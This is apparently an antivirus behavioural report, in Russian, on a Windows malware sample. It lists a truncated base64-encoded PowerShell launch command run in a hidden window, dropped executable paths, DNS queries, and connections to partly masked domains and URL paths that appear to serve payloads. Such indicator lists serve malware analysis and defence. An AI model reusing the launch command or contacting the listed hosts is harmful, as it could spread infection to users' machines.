Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEADAAdwA2AGsAdwA5AD0AKAAnAEIAcwAnACsAKAAnAG0AJwArACcAYwAyACcAKQArACcANwA3ACcAKQA7ACQARgA4AGsAdgBoAGcAeQA9ACQAUgBzADUAagBmAHMAcQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 844
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\964944.cvr
- %HOMEPATH%\c30yq16\ayfxvx7\e9p8t7.exe
- %HOMEPATH%\c30yq16\ayfxvx7\e9p8t7.exe
- 'qu######everything2020.com':443
- 'am####tobh.com.br':80
- 'am####tobh.com.br':443
- 'bl####esagrp.com':80
- 'hi####randing.co.za':80
- 'sa####ietnam.com':443
- http://am####tobh.com.br/sys-cache/idPAR/
- http://bl####esagrp.com/wp-content/DZVi/
- http://hi####randing.co.za/chalcid/1V6T8BH/
- 'qu######everything2020.com':443
- 'am####tobh.com.br':443
- 'sa####ietnam.com':443
- DNS ASK tr###esim.shop
- DNS ASK qu######everything2020.com
- DNS ASK am####tobh.com.br
- DNS ASK tr#####khalkalaki.com
- DNS ASK bl####esagrp.com
- DNS ASK hi####randing.co.za
- DNS ASK sa####ietnam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEADAAdwA2AGsAdwA5AD0AKAAnAEIAcwAnACsAKAAnAG0AJwArACcAYwAyACcAKQArACcANwA3ACcAKQA7ACQARgA4AGsAdgBoAGcAeQA9ACQAUgBzADUAagBmAHMAcQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ... (со скрытым окном)